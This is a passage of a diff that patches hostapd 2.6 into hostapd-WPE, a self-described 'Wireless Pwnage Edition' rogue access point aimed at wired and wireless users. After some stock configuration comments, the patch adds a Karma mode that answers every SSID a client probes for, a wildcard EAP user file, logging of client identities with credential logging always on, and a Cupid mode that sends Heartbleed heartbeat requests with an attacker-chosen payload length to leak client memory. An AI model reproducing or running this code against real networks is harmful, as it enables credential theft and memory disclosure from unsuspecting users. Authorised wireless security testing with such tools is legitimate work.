3074+# no value provided during session setup. Default is 50 ms. 3075+# fst_llt is in 1..4294967 range (due to spec limitation, see 10.32.2.2 3076+# Transitioning between states). 3077+#fst_llt=100 3078+ 3079+##### Radio measurements / location ########################################### 3080+ 3081+# The content of a LCI measurement subelement 3082+#lci=<Hexdump of binary data of the LCI report> 3083+ 3084+# The content of a location civic measurement subelement 3085+#civic=<Hexdump of binary data of the location civic report> 3086+ 3087+# Enable neighbor report via radio measurements 3088+#rrm_neighbor_report=1 3089+ 3090+# Publish fine timing measurement (FTM) responder functionality 3091+# This parameter only controls publishing via Extended Capabilities element. 3092+# Actual functionality is managed outside hostapd. 3093+#ftm_responder=0 3094+ 3095+# Publish fine timing measurement (FTM) initiator functionality 3096+# This parameter only controls publishing via Extended Capabilities element. 3097+# Actual functionality is managed outside hostapd. 3098+#ftm_initiator=0 3099+ 3100+##### TESTING OPTIONS ######################################################### 3101+# 3102+# The options in this section are only available when the build configuration 3103+# option CONFIG_TESTING_OPTIONS is set while compiling hostapd. They allow 3104+# testing some scenarios that are otherwise difficult to reproduce. 3105+# 3106+# Ignore probe requests sent to hostapd with the given probability, must be a 3107+# floating point number in the range [0, 1). 3108+#ignore_probe_probability=0.0 3109+# 3110+# Ignore authentication frames with the given probability 3111+#ignore_auth_probability=0.0 3112+# 3113+# Ignore association requests with the given probability 3114+#ignore_assoc_probability=0.0 3115+# 3116+# Ignore reassociation requests with the given probability 3117+#ignore_reassoc_probability=0.0 3118+# 3119+# Corrupt Key MIC in GTK rekey EAPOL-Key frames with the given probability 3120+#corrupt_gtk_rekey_mic_probability=0.0 3121+# 3122+# Include only ECSA IE without CSA IE where possible 3123+# (channel switch operating class is needed) 3124+#ecsa_ie_only=0 3125+ 3126+##### Multiple BSSID support ################################################## 3127+# 3128+# Above configuration is using the default interface (wlan#, or multi-SSID VLAN 3129+# interfaces). Other BSSIDs can be added by using separator 'bss' with 3130+# default interface name to be allocated for the data packets of the new BSS. 3131+# 3132+# hostapd will generate BSSID mask based on the BSSIDs that are 3133+# configured. hostapd will verify that dev_addr & MASK == dev_addr. If this is 3134+# not the case, the MAC address of the radio must be changed before starting 3135+# hostapd (ifconfig wlan0 hw ether <MAC addr>). If a BSSID is configured for 3136+# every secondary BSS, this limitation is not applied at hostapd and other 3137+# masks may be used if the driver supports them (e.g., swap the locally 3138+# administered bit) 3139+# 3140+# BSSIDs are assigned in order to each BSS, unless an explicit BSSID is 3141+# specified using the 'bssid' parameter. 3142+# If an explicit BSSID is specified, it must be chosen such that it: 3143+# - results in a valid MASK that covers it and the dev_addr 3144+# - is not the same as the MAC address of the radio 3145+# - is not the same as any other explicitly specified BSSID 3146+# 3147+# Alternatively, the 'use_driver_iface_addr' parameter can be used to request 3148+# hostapd to use the driver auto-generated interface address (e.g., to use the 3149+# exact MAC addresses allocated to the device). 3150+# 3151+# Not all drivers support multiple BSSes. The exact mechanism for determining 3152+# the driver capabilities is driver specific. With the current (i.e., a recent 3153+# kernel) drivers using nl80211, this information can be checked with "iw list" 3154+# (search for "valid interface combinations"). 3155+# 3156+# Please note that hostapd uses some of the values configured for the first BSS 3157+# as the defaults for the following BSSes. However, it is recommended that all 3158+# BSSes include explicit configuration of all relevant configuration items. 3159+# 3160+#bss=wlan0_0 3161+#ssid=test2 3162+# most of the above items can be used here (apart from radio interface specific 3163+# items, like channel) 3164+ 3165+#bss=wlan0_1 3166+#bssid=00:13:10:95:fe:0b 3167+# ... 3168diff -rupN hostapd-2.6/hostapd/hostapd-wpe.eap_user hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 3169--- hostapd-2.6/hostapd/hostapd-wpe.eap_user 1970-01-01 01:00:00.000000000 +0100 3170+++ hostapd-2.6-wpe/hostapd/hostapd-wpe.eap_user 2018-05-21 11:37:58.859577170 +0200 3171@@ -0,0 +1,107 @@ 3172+# hostapd user database for integrated EAP server 3173+ 3174+# Each line must contain an identity, EAP method(s), and an optional password 3175+# separated with whitespace (space or tab). The identity and password must be 3176+# double quoted ("user"). Password can alternatively be stored as 3177+# NtPasswordHash (16-byte MD4 hash of the unicode presentation of the password 3178+# in unicode) if it is used for MSCHAP or MSCHAPv2 authentication. This means 3179+# that the plaintext password does not need to be included in the user file. 3180+# Password hash is stored as hash:<16-octets of hex data> without quotation 3181+# marks. 3182+ 3183+# [2] flag in the end of the line can be used to mark users for tunneled phase 3184+# 2 authentication (e.g., within EAP-PEAP). In these cases, an anonymous 3185+# identity can be used in the unencrypted phase 1 and the real user identity 3186+# is transmitted only within the encrypted tunnel in phase 2. If non-anonymous 3187+# access is needed, two user entries is needed, one for phase 1 and another 3188+# with the same username for phase 2. 3189+# 3190+# EAP-TLS, EAP-PEAP, EAP-TTLS, EAP-FAST, EAP-SIM, and EAP-AKA do not use 3191+# password option. 3192+# EAP-MD5, EAP-MSCHAPV2, EAP-GTC, EAP-PAX, EAP-PSK, and EAP-SAKE require a 3193+# password. 3194+# EAP-PEAP, EAP-TTLS, and EAP-FAST require Phase 2 configuration. 3195+# 3196+# * can be used as a wildcard to match any user identity. The main purposes for 3197+# this are to set anonymous phase 1 identity for EAP-PEAP and EAP-TTLS and to 3198+# avoid having to configure every certificate for EAP-TLS authentication. The 3199+# first matching entry is selected, so * should be used as the last phase 1 3200+# user entry. 3201+# 3202+# "prefix"* can be used to match the given prefix and anything after this. The 3203+# main purpose for this is to be able to avoid EAP method negotiation when the 3204+# method is using known prefix in identities (e.g., EAP-SIM and EAP-AKA). This 3205+# is only allowed for phase 1 identities. 3206+# 3207+# Multiple methods can be configured to make the authenticator try them one by 3208+# one until the peer accepts one. The method names are separated with a 3209+# comma (,). 3210+# 3211+# [ver=0] and [ver=1] flags after EAP type PEAP can be used to force PEAP 3212+# version based on the Phase 1 identity. Without this flag, the EAP 3213+# authenticator advertises the highest supported version and select the version 3214+# based on the first PEAP packet from the supplicant. 3215+# 3216+# EAP-TTLS supports both EAP and non-EAP authentication inside the tunnel. 3217+# Tunneled EAP methods are configured with standard EAP method name and [2] 3218+# flag. Non-EAP methods can be enabled by following method names: TTLS-PAP, 3219+# TTLS-CHAP, TTLS-MSCHAP, TTLS-MSCHAPV2. TTLS-PAP and TTLS-CHAP require a 3220+# plaintext password while TTLS-MSCHAP and TTLS-MSCHAPV2 can use NT password 3221+# hash. 3222+# 3223+# Arbitrary RADIUS attributes can be added into Access-Accept packets similarly 3224+# to the way radius_auth_req_attr is used for Access-Request packet in 3225+# hostapd.conf. For EAP server, this is configured separately for each user 3226+# entry with radius_accept_attr=<value> line(s) following the main user entry 3227+# line. 3228+ 3229+# Phase 1 users 3230+#"user" MD5 "password" 3231+#"test user" MD5 "secret" 3232+#"example user" TLS 3233+#"DOMAIN\user" MSCHAPV2 "password" 3234+#"gtc user" GTC "password" 3235+#"pax user" PAX "unknown" 3236+#"pax.user@example.com" PAX 0123456789abcdef0123456789abcdef 3237+#"psk user" PSK "unknown" 3238+#"psk.user@example.com" PSK 0123456789abcdef0123456789abcdef 3239+#"sake.user@example.com" SAKE 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef 3240+#"ttls" TTLS 3241+#"not anonymous" PEAP 3242+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes 3243+#"0"* AKA,TTLS,TLS,PEAP,SIM 3244+#"1"* SIM,TTLS,TLS,PEAP,AKA 3245+#"2"* AKA,TTLS,TLS,PEAP,SIM 3246+#"3"* SIM,TTLS,TLS,PEAP,AKA 3247+#"4"* AKA,TTLS,TLS,PEAP,SIM 3248+#"5"* SIM,TTLS,TLS,PEAP,AKA 3249+#"6"* AKA' 3250+#"7"* AKA' 3251+#"8"* AKA' 3252+ 3253+# Wildcard for all other identities 3254+#* PEAP,TTLS,TLS,SIM,AKA 3255+ 3256+# Phase 2 (tunnelled within EAP-PEAP or EAP-TTLS) users 3257+#"t-md5" MD5 "password" [2] 3258+#"DOMAIN\t-mschapv2" MSCHAPV2 "password" [2] 3259+#"t-gtc" GTC "password" [2] 3260+#"not anonymous" MSCHAPV2 "password" [2] 3261+#"user" MD5,GTC,MSCHAPV2 "password" [2] 3262+#"test user" MSCHAPV2 hash:000102030405060708090a0b0c0d0e0f [2] 3263+#"ttls-user" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,TTLS-MSCHAPV2 "password" [2] 3264+ 3265+# Default to EAP-SIM and EAP-AKA based on fixed identity prefixes in phase 2 3266+#"0"* AKA [2] 3267+#"1"* SIM [2] 3268+#"2"* AKA [2] 3269+#"3"* SIM [2] 3270+#"4"* AKA [2] 3271+#"5"* SIM [2] 3272+#"6"* AKA' [2] 3273+#"7"* AKA' [2] 3274+#"8"* AKA' [2] 3275+ 3276+# WPE - DO NOT REMOVE - These entries are specifically in here 3277+* PEAP,TTLS,TLS,FAST 3278+"t" TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "t" [2] 3279diff -rupN hostapd-2.6/hostapd/main.c hostapd-2.6-wpe/hostapd/main.c 3280--- hostapd-2.6/hostapd/main.c 2016-10-02 20:51:11.000000000 +0200 3281+++ hostapd-2.6-wpe/hostapd/main.c 2018-05-21 11:37:58.859577170 +0200 3282@@ -28,7 +28,7 @@ 3283 #include "config_file.h" 3284 #include "eap_register.h" 3285 #include "ctrl_iface.h" 3286- 3287+#include "wpe/wpe.h" 3288 3289 struct hapd_global { 3290 void **drv_priv; 3291@@ -448,11 +448,16 @@ static int hostapd_global_run(struct hap 3292 static void show_version(void) 3293 { 3294 fprintf(stderr, 3295- "hostapd v" VERSION_STR "\n" 3296+ "hostapd-WPE v" VERSION_STR "\n" 3297 "User space daemon for IEEE 802.11 AP management,\n" 3298 "IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n" 3299 "Copyright (c) 2002-2016, Jouni Malinen <j@w1.fi> " 3300- "and contributors\n"); 3301+ "and contributors\n" 3302+ "-----------------------------------------------------\n" 3303+ "WPE (Wireless Pwnage Edition)\n" 3304+ "This version has been cleverly modified to target\n" 3305+ "wired and wireless users.\n" 3306+ "Thomas d'Otreppe <@aircrackng>"); 3307 } 3308 3309 3310@@ -461,7 +466,7 @@ static void usage(void) 3311 show_version(); 3312 fprintf(stderr, 3313 "\n" 3314- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] " 3315+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] " 3316 "\\\n" 3317 " [-g <global ctrl_iface>] [-G <group>]\\\n" 3318 " [-i <comma-separated list of interface names>]\\\n" 3319@@ -486,7 +491,15 @@ static void usage(void) 3320 " -i list of interface names to use\n" 3321 " -S start all the interfaces synchronously\n" 3322 " -t include timestamps in some debug messages\n" 3323- " -v show hostapd version\n"); 3324+ " -v show hostapd version\n\n" 3325+ "\n" 3326+ " WPE Options -------------------\n" 3327+ " (credential logging always enabled)\n" 3328+ " -s Return Success where possible\n" 3329+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3330+ " -c Cupid Mode (Heartbleed clients)\n\n" 3331+#endif 3332+ " -k Karma Mode (Respond to all probes)\n\n"); 3333 3334 exit(1); 3335 } 3336@@ -661,7 +674,7 @@ int main(int argc, char *argv[]) 3337 dl_list_init(&interfaces.global_ctrl_dst); 3338 3339 for (;;) { 3340- c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:"); 3341+ c = getopt(argc, argv, "b:Bde:f:hi:KP:STtu:vg:G:kcs"); 3342 if (c < 0) 3343 break; 3344 switch (c) { 3345@@ -725,6 +738,15 @@ int main(int argc, char *argv[]) 3346 case 'u': 3347 return gen_uuid(optarg); 3348 #endif /* CONFIG_WPS */ 3349+ case 'k': 3350+ wpe_conf.wpe_enable_karma++; 3351+ break; 3352+ case 'c': 3353+ wpe_conf.wpe_enable_cupid++; 3354+ break; 3355+ case 's': 3356+ wpe_conf.wpe_enable_return_success++; 3357+ break; 3358 case 'i': 3359 if (hostapd_get_interface_names(&if_names, 3360 &if_names_size, optarg)) 3361diff -rupN hostapd-2.6/hostapd/Makefile hostapd-2.6-wpe/hostapd/Makefile 3362--- hostapd-2.6/hostapd/Makefile 2016-10-02 20:51:11.000000000 +0200 3363+++ hostapd-2.6-wpe/hostapd/Makefile 2018-05-21 11:37:58.863577170 +0200 3364@@ -86,6 +86,7 @@ OBJS += ../src/ap/beacon.o 3365 OBJS += ../src/ap/bss_load.o 3366 OBJS += ../src/ap/neighbor_db.o 3367 OBJS += ../src/ap/rrm.o 3368+OBJS += ../src/wpe/wpe.o 3369 3370 OBJS_c = hostapd_cli.o 3371 OBJS_c += ../src/common/wpa_ctrl.o 3372@@ -1012,7 +1013,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o 3373 endif 3374 endif 3375 3376-ALL=hostapd hostapd_cli 3377+ALL=hostapd-wpe hostapd-wpe_cli 3378 3379 all: verify_config $(ALL) 3380 3381@@ -1051,6 +1052,15 @@ $(DESTDIR)$(BINDIR)/%: % 3382 3383 install: $(addprefix $(DESTDIR)$(BINDIR)/,$(ALL)) 3384 3385+wpe: 3386+ install -d $(DESTDIR)/etc/hostapd-wpe 3387+ install -m 644 hostapd-wpe.conf hostapd-wpe.eap_user $(DESTDIR)/etc/hostapd-wpe 3388+ install -d $(DESTDIR)/etc/hostapd-wpe/certs 3389+ install -d $(DESTDIR)/etc/hostapd-wpe/certs/demoCA 3390+ install -m 644 certs/demoCA/cacert.pem $(DESTDIR)/etc/hostapd-wpe/certs/demoCA 3391+ install -m 755 certs/bootstrap $(DESTDIR)/etc/hostapd-wpe/certs 3392+ install -m 644 certs/ca.cnf certs/client.cnf certs/Makefile certs/README certs/README.wpe certs/server.cnf certs/xpextensions $(DESTDIR)/etc/hostapd-wpe/certs 3393+ 3394 ../src/drivers/build.hostapd: 3395 @if [ -f ../src/drivers/build.wpa_supplicant ]; then \ 3396 $(MAKE) -C ../src/drivers clean; \ 3397@@ -1059,15 +1069,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR) 3398 3399 BCHECK=../src/drivers/build.hostapd 3400 3401-hostapd: $(BCHECK) $(OBJS) 3402- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS) 3403+hostapd-wpe: $(BCHECK) $(OBJS) 3404+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS) 3405 @$(E) " LD " $@ 3406 3407 ifdef CONFIG_WPA_TRACE 3408 OBJS_c += ../src/utils/trace.o 3409 endif 3410-hostapd_cli: $(OBJS_c) 3411- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c) 3412+hostapd-wpe_cli: $(OBJS_c) 3413+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c) 3414 @$(E) " LD " $@ 3415 3416 NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS) 3417@@ -1114,7 +1124,7 @@ lcov-html: 3418 3419 clean: 3420 $(MAKE) -C ../src clean 3421- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw 3422+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw 3423 rm -f *.d *.gcno *.gcda *.gcov 3424 rm -f lcov.info 3425 rm -rf lcov-html 3426diff -rupN hostapd-2.6/src/ap/beacon.c hostapd-2.6-wpe/src/ap/beacon.c 3427--- hostapd-2.6/src/ap/beacon.c 2016-10-02 20:51:11.000000000 +0200 3428+++ hostapd-2.6-wpe/src/ap/beacon.c 2018-05-21 11:37:58.863577170 +0200 3429@@ -30,7 +30,7 @@ 3430 #include "hs20.h" 3431 #include "dfs.h" 3432 #include "taxonomy.h" 3433- 3434+#include "wpe/wpe.h" 3435 3436 #ifdef NEED_AP_MLME 3437 3438@@ -817,6 +817,13 @@ void handle_probe_req(struct hostapd_dat 3439 } 3440 #endif /* CONFIG_TAXONOMY */ 3441 3442+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) { 3443+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len)); 3444+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len); 3445+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len); 3446+ hapd->conf->ssid.ssid_len = elems.ssid_len; 3447+ } 3448+ 3449 res = ssid_match(hapd, elems.ssid, elems.ssid_len, 3450 elems.ssid_list, elems.ssid_list_len); 3451 if (res == NO_SSID_MATCH) { 3452diff -rupN hostapd-2.6/src/ap/ieee802_11.c hostapd-2.6-wpe/src/ap/ieee802_11.c 3453--- hostapd-2.6/src/ap/ieee802_11.c 2016-10-02 20:51:11.000000000 +0200 3454+++ hostapd-2.6-wpe/src/ap/ieee802_11.c 2018-05-21 11:37:58.863577170 +0200 3455@@ -45,7 +45,7 @@ 3456 #include "mbo_ap.h" 3457 #include "rrm.h" 3458 #include "taxonomy.h" 3459- 3460+#include "wpe/wpe.h" 3461 3462 u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid) 3463 { 3464@@ -1418,8 +1418,8 @@ static u16 check_ssid(struct hostapd_dat 3465 if (ssid_ie == NULL) 3466 return WLAN_STATUS_UNSPECIFIED_FAILURE; 3467 3468- if (ssid_ie_len != hapd->conf->ssid.ssid_len || 3469- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) { 3470+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len || 3471+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) { 3472 hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211, 3473 HOSTAPD_LEVEL_INFO, 3474 "Station tried to associate with unknown SSID " 3475diff -rupN hostapd-2.6/src/ap/ieee802_1x.c hostapd-2.6-wpe/src/ap/ieee802_1x.c 3476--- hostapd-2.6/src/ap/ieee802_1x.c 2016-10-02 20:51:11.000000000 +0200 3477+++ hostapd-2.6-wpe/src/ap/ieee802_1x.c 2018-05-21 11:54:26.455559484 +0200 3478@@ -729,6 +729,9 @@ static void handle_eap_response(struct h 3479 { 3480 u8 type, *data; 3481 struct eapol_state_machine *sm = sta->eapol_sm; 3482+ const u8 *identity; 3483+ size_t identity_len; 3484+ 3485 if (sm == NULL) 3486 return; 3487 3488@@ -747,6 +750,16 @@ static void handle_eap_response(struct h 3489 eap->code, eap->identifier, be_to_host16(eap->length), 3490 eap_server_get_name(0, type), type); 3491 3492+/* Print Response-Identity from STA*/ 3493+ identity = eap_get_identity(sm->eap, &identity_len); 3494+ os_free(sm->identity); 3495+ sm->identity = (u8 *) dup_binstr(identity, identity_len); 3496+ sm->identity_len = identity_len; 3497+ if (identity != NULL) { 3498+ hostapd_logger(hapd, sm->addr, HOSTAPD_MODULE_IEEE8021X, 3499+ HOSTAPD_LEVEL_INFO, "Identity received from STA: '%s'", sm->identity); 3500+ } 3501+ 3502 sm->dot1xAuthEapolRespFramesRx++; 3503 3504 wpabuf_free(sm->eap_if->eapRespData); 3505diff -rupN hostapd-2.6/src/crypto/ms_funcs.h hostapd-2.6-wpe/src/crypto/ms_funcs.h 3506--- hostapd-2.6/src/crypto/ms_funcs.h 2016-10-02 20:51:11.000000000 +0200 3507+++ hostapd-2.6-wpe/src/crypto/ms_funcs.h 2018-05-21 11:37:58.863577170 +0200 3508@@ -9,6 +9,10 @@ 3509 #ifndef MS_FUNCS_H 3510 #define MS_FUNCS_H 3511 3512+int challenge_hash(const u8 *peer_challenge, const u8 *auth_challenge, 3513+ const u8 *username, size_t username_len, 3514+ u8 *challenge); 3515+ 3516 int generate_nt_response(const u8 *auth_challenge, const u8 *peer_challenge, 3517 const u8 *username, size_t username_len, 3518 const u8 *password, size_t password_len, 3519diff -rupN hostapd-2.6/src/crypto/tls_openssl.c hostapd-2.6-wpe/src/crypto/tls_openssl.c 3520--- hostapd-2.6/src/crypto/tls_openssl.c 2016-10-02 20:51:11.000000000 +0200 3521+++ hostapd-2.6-wpe/src/crypto/tls_openssl.c 2018-05-21 11:37:58.863577170 +0200 3522@@ -21,6 +21,7 @@ 3523 #include <openssl/opensslv.h> 3524 #include <openssl/pkcs12.h> 3525 #include <openssl/x509v3.h> 3526+#include <openssl/rand.h> 3527 #ifndef OPENSSL_NO_ENGINE 3528 #include <openssl/engine.h> 3529 #endif /* OPENSSL_NO_ENGINE */ 3530@@ -37,6 +38,7 @@ 3531 #include "sha256.h" 3532 #include "tls.h" 3533 #include "tls_openssl.h" 3534+#include "wpe/wpe.h" 3535 3536 #if !defined(CONFIG_FIPS) && \ 3537 (defined(EAP_FAST) || defined(EAP_FAST_DYNAMIC) || \ 3538@@ -179,6 +181,10 @@ static int tls_add_ca_from_keystore_enco 3539 3540 #endif /* ANDROID */ 3541 3542+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3543+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top 3544+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3545+ 3546 static int tls_openssl_ref_count = 0; 3547 static int tls_ex_idx_session = -1; 3548 3549@@ -1347,7 +1353,12 @@ struct tls_connection * tls_connection_i 3550 3551 conn->context = context; 3552 SSL_set_app_data(conn->ssl, conn); 3553- SSL_set_msg_callback(conn->ssl, tls_msg_cb); 3554+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3555+ if (wpe_conf.wpe_enable_cupid) 3556+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb); 3557+ else 3558+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3559+ SSL_set_msg_callback(conn->ssl, tls_msg_cb); 3560 SSL_set_msg_callback_arg(conn->ssl, conn); 3561 options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | 3562 SSL_OP_SINGLE_DH_USE; 3563@@ -3257,6 +3268,10 @@ openssl_handshake(struct tls_connection 3564 { 3565 int res; 3566 struct wpabuf *out_data; 3567+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3568+ int i; 3569+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2; 3570+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3571 3572 /* 3573 * Give TLS handshake data from the server (if available) to OpenSSL 3574@@ -3316,6 +3331,30 @@ openssl_handshake(struct tls_connection 3575 } 3576 wpabuf_put(out_data, res); 3577 3578+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3579+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) { 3580+ 3581+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n"); 3582+ wpe_hb_ptr1 = NULL; 3583+ 3584+ for (i = 0; i < wpe_conf.wpe_hb_num_repeats; i++) { 3585+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1); 3586+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1); 3587+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1); 3588+ 3589+ if (wpe_hb_ptr1) { 3590+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2); 3591+ } else { 3592+ wpe_hb_ptr1 = wpe_hb_ptr2; 3593+ } 3594+ } 3595+ 3596+ conn->ssl->tlsext_hb_pending = 1; 3597+ wpe_conf.wpe_hb_num_tries--; 3598+ return wpe_hb_ptr1; 3599+ } 3600+#endif 3601+ 3602 return out_data; 3603 } 3604 3605@@ -3431,6 +3470,13 @@ struct wpabuf * tls_connection_encrypt(v 3606 tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); 3607 return NULL; 3608 } 3609+ 3610+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3611+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata) { 3612+ wpe_hb_enc(conn); 3613+ } 3614+#endif 3615+ 3616 res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); 3617 if (res < 0) { 3618 tls_show_errors(MSG_INFO, __func__, 3619@@ -3438,6 +3484,12 @@ struct wpabuf * tls_connection_encrypt(v 3620 return NULL; 3621 } 3622 3623+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3624+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata) { 3625+ wpe_hb_enc(conn); 3626+ } 3627+#endif 3628+ 3629 /* Read encrypted data to be sent to the server */ 3630 buf = wpabuf_alloc(wpabuf_len(in_data) + 300); 3631 if (buf == NULL) 3632@@ -4331,3 +4383,69 @@ void tls_connection_remove_session(struc 3633 wpa_printf(MSG_DEBUG, 3634 "OpenSSL: Removed cached session to disable session resumption"); 3635 } 3636+ 3637+#if OPENSSL_VERSION_NUMBER < 0x10100000L 3638+int wpe_hb_enc(struct tls_connection *conn) { 3639+ unsigned char *cbuf, *p; 3640+ 3641+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */ 3642+ unsigned int padding = 16; //default: 16 /* Use minimum padding */ 3643+ 3644+ if (!SSL_is_init_finished(conn->ssl)) { 3645+ return -1; 3646+ } 3647+ 3648+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || 3649+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) { 3650+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n"); 3651+ } else { 3652+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n"); 3653+ } 3654+ 3655+ /* Check if padding is too long, payload and padding 3656+ * must not exceed 2^14 - 3 = 16381 bytes in total. 3657+ */ 3658+ OPENSSL_assert(real_payload + padding <= 16381); 3659+ 3660+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding); 3661+ 3662+ if(cbuf==NULL) 3663+ return -1; 3664+ 3665+ p = cbuf; 3666+ 3667+ *p++ = TLS1_HB_REQUEST; 3668+ 3669+ 3670+ /* Payload length (18 bytes here) */ 3671+ //s2n(payload, p); /* standards compliant payload */ 3672+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */ 3673+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */ 3674+ 3675+ /* Sequence number */ 3676+ s2n(conn->ssl->tlsext_hb_seq, p); 3677+ /* 16 random bytes */ 3678+ RAND_pseudo_bytes(p, 16); 3679+ //RAND_bytes(p, 16); 3680+ p += 16; 3681+ /* Random padding */ 3682+ RAND_pseudo_bytes(p, padding); 3683+ //RAND_bytes(p, padding); 3684+ 3685+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size); 3686+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding); 3687+ 3688+ /* Send heartbeat request */ 3689+#ifdef TLS1_RT_HEARTBEAT 3690+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT, 3691+#elif defined(DTLS1_RT_HEARTBEAT) 3692+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT, 3693+#endif 3694+ cbuf, 3 + real_payload + padding) >= 0) 3695+ conn->ssl->tlsext_hb_pending = 1; 3696+ OPENSSL_free(cbuf); 3697+ 3698+ return 0; 3699+} 3700+#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ 3701+ 3702diff -rupN hostapd-2.6/src/eap_server/eap_server.c hostapd-2.6-wpe/src/eap_server/eap_server.c 3703--- hostapd-2.6/src/eap_server/eap_server.c 2016-10-02 20:51:11.000000000 +0200 3704+++ hostapd-2.6-wpe/src/eap_server/eap_server.c 2018-05-21 11:37:58.863577170 +0200 3705@@ -23,7 +23,8 @@ 3706 #define STATE_MACHINE_DATA struct eap_sm 3707 #define STATE_MACHINE_DEBUG_PREFIX "EAP" 3708 3709-#define EAP_MAX_AUTH_ROUNDS 50 3710+//#define EAP_MAX_AUTH_ROUNDS 50 3711+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:) 3712 3713 static void eap_user_free(struct eap_user *user); 3714 3715@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons 3716 { 3717 struct eap_user *user; 3718 3719+ char ident = 't'; 3720+ 3721 if (sm == NULL || sm->eapol_cb == NULL || 3722 sm->eapol_cb->get_eap_user == NULL) 3723 return -1; 3724@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons 3725 if (user == NULL) 3726 return -1; 3727 3728+ if (phase2) { 3729+ identity = (const u8 *)&ident; 3730+ identity_len = 1; 3731+ } 3732+ 3733 if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity, 3734 identity_len, phase2, user) != 0) { 3735 eap_user_free(user); 3736diff -rupN hostapd-2.6/src/eap_server/eap_server_mschapv2.c hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 3737--- hostapd-2.6/src/eap_server/eap_server_mschapv2.c 2016-10-02 20:51:11.000000000 +0200 3738+++ hostapd-2.6-wpe/src/eap_server/eap_server_mschapv2.c 2018-05-21 11:37:58.863577170 +0200 3739@@ -12,7 +12,7 @@ 3740 #include "crypto/ms_funcs.h" 3741 #include "crypto/random.h" 3742 #include "eap_i.h" 3743- 3744+#include "wpe/wpe.h" 3745 3746 struct eap_mschapv2_hdr { 3747 u8 op_code; /* 